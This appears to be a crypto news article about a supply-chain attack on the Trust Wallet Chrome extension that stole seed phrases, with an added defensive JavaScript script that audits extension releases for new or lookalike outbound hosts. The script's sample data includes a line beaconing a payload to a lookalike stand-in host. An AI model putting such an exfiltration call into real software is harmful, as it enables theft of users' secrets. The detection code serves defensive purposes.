Trust Wallet Chrome Extension Compromised in $7 Million Supply Chain Attack
Trust Wallet users were hit by a supply chain breach that turned a routine browser update into a direct theft vector. Attackers embedded malicious code into an official Chrome extension release, draining funds from hundreds of wallets within hours.
What was compromised
The incident affected the Trust Wallet browser extension for Chrome. The mobile application and other builds were not impacted. Victims did not install third-party software or interact with phishing pages. They updated the extension through the official Chrome Web Store.
The compromised release was version 2.68, published on December 24. From the user perspective, the update appeared legitimate, which made the attack difficult to detect.
How the attack worked
Security investigators identified a trojanized JavaScript file named 4482.js embedded in the update. The file was disguised as analytics code, allowing it to blend into the extension without raising immediate suspicion.
During wallet import, the malicious script intercepted seed phrases and transmitted them to a spoofed domain designed to resemble Trust Wallet telemetry infrastructure. Once a seed phrase was captured, attackers recreated the wallet and emptied it within minutes.
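A release check aimed at this pattern, as an added example that is not Trust Wallet's code or part of the original article: it compares the outbound hosts referenced by two unpacked extension builds and flags any new host that is off the reviewed allowlist, noting when it closely resembles an allowlisted one. The function names, file names, `.example` hosts, sample contents and the edit-distance threshold of 3 are all assumptions constructed for illustration.

```javascript
// Added example: diff the outbound hosts of two unpacked extension releases.
// All file names, hosts and contents below are constructed for illustration.
const URL_RE = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;

function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  return hosts;
}

// Levenshtein distance, used to spot near-miss (lookalike) hostnames.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let prev = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, prev + (a[i - 1] === b[j - 1] ? 0 : 1));
      prev = tmp;
    }
  }
  return row[b.length];
}

// files: { "path.js": "source text" }. Returns hosts first seen in `next`
// that are not on the reviewed allowlist, with the file that introduced them.
function auditRelease(prev, next, allowlist) {
  const known = new Set();
  for (const src of Object.values(prev)) for (const h of extractHosts(src)) known.add(h);
  const findings = [];
  for (const [file, src] of Object.entries(next)) {
    for (const host of extractHosts(src)) {
      if (known.has(host) || allowlist.includes(host)) continue;
      const lookalikeOf = allowlist.find((a) => editDistance(a, host) <= 3) || null; // threshold is an assumption
      findings.push({ file, host, lookalikeOf });
    }
  }
  return findings;
}

const ALLOW = ["telemetry.wallet.example", "rpc.wallet.example"];
const PREV = { "background.js": 'fetch("https://rpc.wallet.example/v1")' };
const NEXT = {
  "background.js": 'fetch("https://rpc.wallet.example/v1")',
  "analytics.js": 'navigator.sendBeacon("https://telemetry-wallet.example/c", p)',
  "ui.js": 'fetch("https://telemetry.wallet.example/ping")',
};
console.log(auditRelease(PREV, NEXT, ALLOW));
```

Hosts assembled at runtime from string fragments will not match the URL pattern, so a clean result from this check does not replace manual review of newly added files.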
Timeline indicates prior planning
According to incident analysis, preparation began on December 8. The infected build was uploaded on December 22. On December 25, during the holiday period when monitoring is typically weaker, attackers initiated mass withdrawals.
Scope of losses
Users across Bitcoin, Ethereum, Solana and other EVM-compatible networks were affected. Estimates indicate that approximately $2.8 million remains in attacker-controlled wallets, while more than $4 million has already passed through centralized services.
Reported flows include roughly $3.3 million to ChangeNOW, about $447,000 to KuCoin, and approximately $340,000 to FixedFloat. One reported victim lost nearly $700,000 within minutes.
Response from Trust Wallet
Binance founder Changpeng Zhao publicly confirmed the breach and stated that Trust Wallet will fully reimburse affected users. The team is investigating how the malicious version passed Chrome Web Store review and entered the official distribution pipeline.
Why this incident matters
This was not a case of phishing or user negligence. The attack exploited trust in official software updates. When the supply chain itself is compromised, standard security advice becomes insufficient.
The incident highlights a systemic risk for browser-based wallets and raises broader questions about build integrity, release verification and third-party distribution platforms.
Conclusion
The Trust Wallet Chrome breach demonstrates how a single compromised update can bypass user defenses and cause rapid, irreversible losses. As crypto infrastructure grows, supply chain security is becoming one of the most critical and least visible attack surfaces.
Editorial Team - CoinBotLab